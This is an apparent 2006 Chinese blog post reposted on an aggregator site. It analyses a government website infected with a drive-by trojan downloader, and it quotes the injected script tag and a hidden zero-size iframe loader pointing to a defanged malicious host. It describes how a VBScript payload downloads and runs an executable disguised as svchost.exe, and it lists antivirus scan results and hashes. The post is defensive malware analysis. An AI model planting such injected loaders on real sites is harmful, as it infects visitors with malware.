一个被挂木马的政府网站
来源:互联网 发布:淘宝软件有限公司 编辑:程序博客网 时间:2024/04/29 20:08
endurer 原创
2006-09-21 第1版
该网站首页被加入代码:
/--------
<script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"></script>
--------/
ad.js 的内容为:
/--------
document.write("<iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm width=0 height=0></iframe>");
--------/
ad***.htm Kaspersky报为:Trojan-Downloader.VBS.Small.av,瑞星报为 Trojan.DL.VBS.Agent.l,其内容为Encode加密的VBScript脚本代码,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www***.zhu**jiang***q*h*.com/images/baidu.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
baidu.exe 瑞星报为 Trojan.DL.Small.tk。
Complete scanning result of "baidu.exe.del", received in VirusTotal at 09.21.2006, 14:50:42 (CET).
Antivirus Version Update Result
AntiVir 7.2.0.16 09.21.2006 HEUR/Malware Authentium 4.93.8 09.21.2006 no virus found Avast 4.7.844.0 09.19.2006 Win32:Tiny-K AVG 386 09.20.2006 Downloader.Generic.RRD BitDefender 7.2 09.21.2006 Generic.Malware.dld!!.17ADDB55 CAT-QuickHeal 8.00 09.20.2006 (Suspicious) - DNAScan ClamAV devel-20060426 09.21.2006 no virus found DrWeb 4.33 09.21.2006 Trojan.DownLoader.4554 eTrust-InoculateIT 23.73.1 09.21.2006 no virus found eTrust-Vet 30.3.3090 09.21.2006 no virus found Ewido 4.0 09.21.2006 no virus found Fortinet 2.82.0.0 09.20.2006 suspicious F-Prot 3.16f 09.21.2006 no virus found F-Prot4 4.2.1.29 09.21.2006 no virus found Ikarus 0.2.65.0 09.20.2006 no virus found Kaspersky 4.0.2.24 09.21.2006 Trojan-Downloader.Win32.Tiny.y McAfee 4856 09.20.2006 no virus found Microsoft 1.1560 09.21.2006 no virus found NOD32v2 1.1765 09.20.2006 a variant of Win32/TrojanDownloader.Tiny.Y Norman 5.90.23 09.21.2006 W32/Suspicious_U.gen Panda 9.0.0.4 09.21.2006 Suspicious file Sophos 4.09.0 09.21.2006 no virus found Symantec 8.0 09.21.2006 no virus found TheHacker 6.0.1.075 09.21.2006 no virus found UNA 1.83 09.20.2006 no virus found VBA32 3.11.1 09.21.2006 no virus found VirusBuster 4.3.7:9 09.20.2006 no virus found
Aditional Information
File size: 1416 bytes MD5: ad492c5aded7310ee2289838622d5827 SHA1: d45b3846691d33cf9374600449688a8c5e2276af packers: UPack- 一个被挂木马的政府网站
- 又一个被挂木马的政府网站(第3版)
- 一个被挂上木马Trojan-Dropper.MSWord.Lafool.i的政府网站
- 某政府网站和某中央企业的网站被挂魔兽网游盗号木马(第2版)
- [10-01]某政府和某中央企业网站被挂的木马升级了(第2版)
- 某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
- 一个下载木马的网站
- 网站被挂iframe木马的解决方案
- 一个网站木马的学习1
- 一个会下载 Trojan.DL.Agent.wzr 的政府网站
- VPS的网站被挂木马的解决办法
- 救命:如何修复被挂木马的php网站
- 网站被挂木马与777权限的奥妙
- 对政府网站的建议
- 国外政府网站的特点
- 七台河政府网站的陷落
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- 一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
- ASP的内置对象-Server对象
- Eclipse Action 6
- 农历类==解析指定的日期 1900-2100
- net辅助工具汇集
- 中国电信业运营支撑系统
- 一个被挂木马的政府网站
- 谈谈软件从业者的学习方向和职业规划(3)
- 安装篇
- 9.21
- 行政区划数据数据库的设计(脚本)
- VC常用开发技巧总结
- 在国际软件自由日里特别感谢的人
- 我对xp关键实践之“结对编程”的理解
- 消息机制